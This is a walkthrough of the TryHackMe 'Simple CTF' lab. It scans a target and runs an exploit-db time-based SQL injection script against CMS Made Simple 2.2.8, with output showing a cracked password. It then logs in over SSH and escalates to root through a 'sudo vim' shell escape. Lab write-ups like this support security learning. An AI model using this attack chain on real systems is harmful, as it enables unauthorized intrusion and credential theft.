📝 TryHackMe. Walkthrough: Simple CTF
- The Site: TryHackMe
- Room name: Simple CTF
- Difficulty: Easy
How many services are running under port 1000?
$ nmap -A 10.10.203.52
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
Answer: *
What is running on the higher port?
Answer: s**
What’s the CVE you’re using against the application?
Let’s try to brute-force the directories on the web server.
$ python3 dirsearch.py -u http://10.10.203.52/
...
[13:47:22] 200 - 929B - /robots.txt
[13:47:26] 301 - 313B - /simple -> http://10.10.203.52/simple/
In the directory /simple/ there is a website; the caption in the footer says that it runs on CMS Made Simple version 2.2.8:
This site is powered by CMS Made Simple version 2.2.8
Let’s look for available exploits with searchsploit.
$ searchsploit 'cms made simple 2.2'
-------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------- ---------------------------------
CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection | php/webapps/4810.txt
CMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated) | php/webapps/48779.py
CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload | php/webapps/48742.txt
CMS Made Simple 2.2.14 - Persistent Cross-Site Scripting (Authenticated) | php/webapps/48851.txt
CMS Made Simple 2.2.15 - 'title' Cross-Site Scripting (XSS) | php/webapps/49793.txt
CMS Made Simple 2.2.15 - RCE (Authenticated) | php/webapps/49345.txt
CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authe | php/webapps/49199.txt
CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution | php/webapps/44976.py
CMS Made Simple 2.2.7 - (Authenticated) Remote Code Execution | php/webapps/45793.py
CMS Made Simple < 2.2.10 - SQL Injection | php/webapps/46635.py
$ searchsploit -m 46635
Exploit: CMS Made Simple < 2.2.10 - SQL Injection
URL: https://www.exploit-db.com/exploits/46635
Path: /usr/local/opt/exploitdb/share/exploitdb/exploits/php/webapps/46635.py
File Type: Python script text executable, ASCII text
The SQL injection entry (46635, affecting versions below 2.2.10) matches our version 2.2.8, so that is the one to use.
Answer: CVE-2019-****
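Picking the right searchsploit entry comes down to a version comparison, and comparing the strings naively gets exactly this case wrong ("2.2.8" sorts after "2.2.10" lexicographically). The following Python snippet is an added example, not part of the original walkthrough: it parses the footer banner and the entry title quoted above and compares the versions as integer tuples.

```python
import re

# Constructed sample input: the footer line seen on /simple/ and the title of
# the searchsploit SQL injection entry, both as quoted in the walkthrough.
FOOTER = "This site is powered by CMS Made Simple version 2.2.8"
ENTRY_TITLE = "CMS Made Simple < 2.2.10 - SQL Injection"


def parse_version(text):
    """Turn a dotted version string such as '2.2.8' into the tuple (2, 2, 8)."""
    return tuple(int(part) for part in text.split("."))


def version_from_footer(footer):
    """Extract the version advertised in the CMS Made Simple footer, or None."""
    match = re.search(r"CMS Made Simple version (\d+(?:\.\d+)*)", footer)
    return parse_version(match.group(1)) if match else None


def affected_bound(title):
    """Parse a title of the form 'CMS Made Simple < X.Y.Z - ...'.

    Returns the exclusive upper bound of the affected range as a tuple, or
    None when the title carries no '<' bound.
    """
    match = re.search(r"<\s*(\d+(?:\.\d+)*)", title)
    return parse_version(match.group(1)) if match else None


def is_affected(installed, bound):
    """True when the installed version is strictly below the upper bound."""
    return installed < bound


def naive_string_check(installed_text, bound_text):
    """The mistake to avoid: comparing versions as plain strings.

    '2.2.8' < '2.2.10' is False because '8' > '1' character-wise, so the
    vulnerable install would be reported as not affected.
    """
    return installed_text < bound_text


if __name__ == "__main__":
    installed = version_from_footer(FOOTER)
    bound = affected_bound(ENTRY_TITLE)
    print(f"installed {installed}, affected below {bound}: {is_affected(installed, bound)}")
    print("naive string comparison says affected:", naive_string_check("2.2.8", "2.2.10"))
```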
To what kind of vulnerability is the application vulnerable?
Answer: sq**
What’s the password?
$ python 46635.py
[+] Specify an url target
[+] Example usage (no cracking password): exploit.py -u http://target-uri
[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist
[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based.
$ python 46635.py -u http://10.10.203.52/simple/ --crack -w password-list-all.txt
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
[+] Password cracked: secret
Where can you login with the details obtained?
With these credentials we can try to log in over SSH (port 2222).
Answer: s*h
What’s the user flag?
Read the file in your home directory.
Answer: ***d **b, ke** u*!
Is there any other user in the home directory? What’s its name?
$ ls -la /home/
Answer: su****h
What can you leverage to spawn a privileged shell?
Let’s check what privileges we have with sudo.
$ sudo --list
User mitch may run the following commands on Machine:
(root) NOPASSWD: /usr/bin/vim
Answer: **m
What’s the root flag?
Get a root shell through sudo.
$ sudo vim -c ':!/bin/sh'
Then read the file with the flag in the /root/ directory.
Answer: W*** d***. **u **** ***